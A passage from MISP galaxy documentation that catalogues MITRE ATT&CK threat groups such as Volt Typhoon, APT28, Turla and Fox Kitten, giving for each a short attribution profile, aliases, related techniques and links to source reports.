[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Operation Wocao - G0116"

Operation Wocao - G0116 is also known as:

  • Operation Wocao

Table 7036. Table References

Links

https://attack.mitre.org/groups/G0116

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

Fox Kitten - G0117

[Fox Kitten](https://attack.mitre.org/groups/G0117) is a threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE)(Citation: ClearSky Pay2Kitten December 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Fox Kitten - G0117"

Fox Kitten - G0117 is also known as:

  • Fox Kitten

  • UNC757

  • Parisite

  • Pioneer Kitten

Table 7037. Table References

Links

https://attack.mitre.org/groups/G0117

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

https://www.clearskysec.com/fox-kitten/

https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf

https://www.crowdstrike.com/blog/who-is-pioneer-kitten/

https://www.dragos.com/threat/parisite/

Volt Typhoon - G1017

[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People’s Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://attack.mitre.org/groups/G1017) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US, including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations, using web shells, living-off-the-land (LOTL) binaries, hands-on-keyboard activity, and stolen credentials.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)

The tag is: misp-galaxy:mitre-intrusion-set="Volt Typhoon - G1017"

Volt Typhoon - G1017 is also known as:

  • Volt Typhoon

  • BRONZE SILHOUETTE

Table 7038. Table References

Links

https://attack.mitre.org/groups/G1017

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

Indrik Spider - G0119

[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://attack.mitre.org/groups/G0119) changed their tactics and diversified their toolset.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Indrik Spider - G0119"

Indrik Spider - G0119 is also known as:

  • Indrik Spider

  • Evil Corp

Table 7039. Table References

Links

https://attack.mitre.org/groups/G0119

https://home.treasury.gov/news/press-releases/sm845

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

Silent Librarian - G0122

[Silent Librarian](https://attack.mitre.org/groups/G0122) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://attack.mitre.org/groups/G0122) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Malwarebytes Silent Librarian October 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Silent Librarian - G0122"

Silent Librarian - G0122 is also known as:

  • Silent Librarian

  • TA407

  • COBALT DICKENS

Table 7040. Table References

Links

https://attack.mitre.org/groups/G0122

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

https://www.justice.gov/usao-sdny/press-release/file/1045781/download

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

Volatile Cedar - G0123

[Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Volatile Cedar - G0123"

Volatile Cedar - G0123 is also known as:

  • Volatile Cedar

  • Lebanese Cedar

Table 7041. Table References

Links

https://attack.mitre.org/groups/G0123

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

Mustang Panda - G0129

[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Mustang Panda - G0129"

Mustang Panda - G0129 is also known as:

  • Mustang Panda

  • TA416

  • RedDelta

  • BRONZE PRESIDENT

Table 7042. Table References

Links

https://attack.mitre.org/groups/G0129

https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

https://www.secureworks.com/research/bronze-president-targets-ngos

Nomadic Octopus - G0133

[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Nomadic Octopus - G0133"

Nomadic Octopus - G0133 is also known as:

  • Nomadic Octopus

  • DustSquad

Table 7043. Table References

Links

https://attack.mitre.org/groups/G0133

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Aquatic Panda - G0143

[Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Aquatic Panda - G0143"

Aquatic Panda - G0143 is also known as:

  • Aquatic Panda

Table 7044. Table References

Links

https://attack.mitre.org/groups/G0143

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

Transparent Tribe - G0134

[Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Transparent Tribe - G0134"

Transparent Tribe - G0134 is also known as:

  • Transparent Tribe

  • COPPER FIELDSTONE

  • APT36

  • Mythic Leopard

  • ProjectM

Transparent Tribe - G0134 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56" with estimative-language:likelihood-probability="likely"

Table 7045. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/

https://attack.mitre.org/groups/G0134

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://securelist.com/transparent-tribe-part-1/98127/

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

Ferocious Kitten - G0137

[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Ferocious Kitten - G0137"

Ferocious Kitten - G0137 is also known as:

  • Ferocious Kitten

Table 7046. Table References

Links

https://attack.mitre.org/groups/G0137

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

LAPSUS$ - G1004

[LAPSUS$](https://attack.mitre.org/groups/G1004) is a cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)

The tag is: misp-galaxy:mitre-intrusion-set="LAPSUS$ - G1004"

LAPSUS$ - G1004 is also known as:

  • LAPSUS$

  • DEV-0537

Table 7047. Table References

Links

https://attack.mitre.org/groups/G1004

https://unit42.paloaltonetworks.com/lapsus-group/

https://www.bbc.com/news/technology-60953527

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

APT-C-36 - G0099

[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South American espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)

The tag is: misp-galaxy:mitre-intrusion-set="APT-C-36 - G0099"

APT-C-36 - G0099 is also known as:

  • APT-C-36

  • Blind Eagle

Table 7048. Table References

Links

https://attack.mitre.org/groups/G0099

https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

TEMP.Veles - G0088

[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)

The tag is: misp-galaxy:mitre-intrusion-set="TEMP.Veles - G0088"

TEMP.Veles - G0088 is also known as:

  • TEMP.Veles

  • XENOTIME

Table 7049. Table References

Links

https://attack.mitre.org/groups/G0088

https://dragos.com/resource/xenotime/

https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html

https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html

FIN10 - G0051

[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)

The tag is: misp-galaxy:mitre-intrusion-set="FIN10 - G0051"

FIN10 - G0051 is also known as:

  • FIN10

FIN10 - G0051 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 7050. Table References

Links

https://attack.mitre.org/groups/G0051

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

APT12 - G0005

[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)

The tag is: misp-galaxy:mitre-intrusion-set="APT12 - G0005"

APT12 - G0005 is also known as:

  • APT12

  • IXESHE

  • DynCalc

  • Numbered Panda

  • DNSCALC

APT12 - G0005 has relationships with:

  • similar: misp-galaxy:threat-actor="APT12" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Ixeshe - S0015" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-malware="RIPTIDE - S0003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 7051. Table References

Links

http://www.crowdstrike.com/blog/whois-numbered-panda/

https://attack.mitre.org/groups/G0005

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

APT30 - G0013

[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)

The tag is: misp-galaxy:mitre-intrusion-set="APT30 - G0013"

APT30 - G0013 is also known as:

  • APT30

APT30 - G0013 has relationships with:

  • similar: misp-galaxy:threat-actor="Naikon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Naikon - G0019" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BACKSPACE - S0031" with estimative-language:likelihood-probability="almost-certain"

Table 7052. Table References

Links

https://attack.mitre.org/groups/G0013

https://securelist.com/the-naikon-apt/69953/

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

APT1 - G0006

[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-intrusion-set="APT1 - G0006"

APT1 - G0006 is also known as:

  • APT1

  • Comment Crew

  • Comment Group

  • Comment Panda

APT1 - G0006 has relationships with:

  • similar: misp-galaxy:threat-actor="APT1" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7053. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/groups/G0006

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Axiom - G0001

[Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015)

The tag is: misp-galaxy:mitre-intrusion-set="Axiom - G0001"

Axiom - G0001 is also known as:

  • Axiom

  • Group 72

Axiom - G0001 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 7054. Table References

Links

http://blogs.cisco.com/security/talos/threat-spotlight-group-72

https://attack.mitre.org/groups/G0001

https://securelist.com/games-are-over/70991/

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

Inception - G0100

[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Inception - G0100"

Inception - G0100 is also known as:

  • Inception

  • Inception Framework

  • Cloud Atlas

Table 7055. Table References

Links

https://attack.mitre.org/groups/G0100

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

Turla - G0010

[Turla](https://attack.mitre.org/groups/G0010) is a cyber espionage threat group that has been attributed to Russia’s Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos](https://attack.mitre.org/software/S0022).(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)

The tag is: misp-galaxy:mitre-intrusion-set="Turla - G0010"

Turla - G0010 is also known as:

  • Turla

  • IRON HUNTER

  • Group 88

  • Belugasturgeon

  • Waterbug

  • WhiteBear

  • Snake

  • Krypton

  • Venomous Bear

Turla - G0010 has relationships with:

  • similar: misp-galaxy:threat-actor="APT26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="almost-certain"

Table 7056. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hunter

https://attack.mitre.org/groups/G0010

https://blog.talosintelligence.com/2021/09/tinyturla.html

https://securelist.com/introducing-whitebear/81638/

https://securelist.com/the-epic-turla-operation/65545/

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf

APT32 - G0050

[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)

The tag is: misp-galaxy:mitre-intrusion-set="APT32 - G0050"

APT32 - G0050 is also known as:

  • APT32

  • SeaLotus

  • OceanLotus

  • APT-C-00

APT32 - G0050 has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7057. Table References

Links

https://attack.mitre.org/groups/G0050

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

TA505 - G0092

[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)

The tag is: misp-galaxy:mitre-intrusion-set="TA505 - G0092"

TA505 - G0092 is also known as:

  • TA505

  • Hive0065

Table 7058. Table References

Links

https://attack.mitre.org/groups/G0092

https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505

https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter

APT28 - G0007

[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)

[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

The tag is: misp-galaxy:mitre-intrusion-set="APT28 - G0007"

APT28 - G0007 is also known as:

  • APT28

  • SNAKEMACKEREL

  • Swallowtail

  • Group 74

  • Sednit

  • Sofacy

  • Pawn Storm

  • Fancy Bear

  • STRONTIUM

  • Tsar Team

  • Threat Group-4127

  • TG-4127

APT28 - G0007 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

Table 7059. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/

https://attack.mitre.org/groups/G0007

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www.justice.gov/file/1080281/download

https://www.justice.gov/opa/page/file/1098481/download

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

Equation - G0020

[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-intrusion-set="Equation - G0020"

Equation - G0020 is also known as:

  • Equation

Equation - G0020 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109" with estimative-language:likelihood-probability="almost-certain"

Table 7060. Table References

Links

https://attack.mitre.org/groups/G0020

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

Moafee - G0002

[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guangdong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)

The tag is: misp-galaxy:mitre-intrusion-set="Moafee - G0002"

Moafee - G0002 is also known as:

  • Moafee

Moafee - G0002 has relationships with:

  • similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="DragonOK - G0017" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Table 7061. Table References

Links

https://attack.mitre.org/groups/G0002

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Ke3chang - G0004

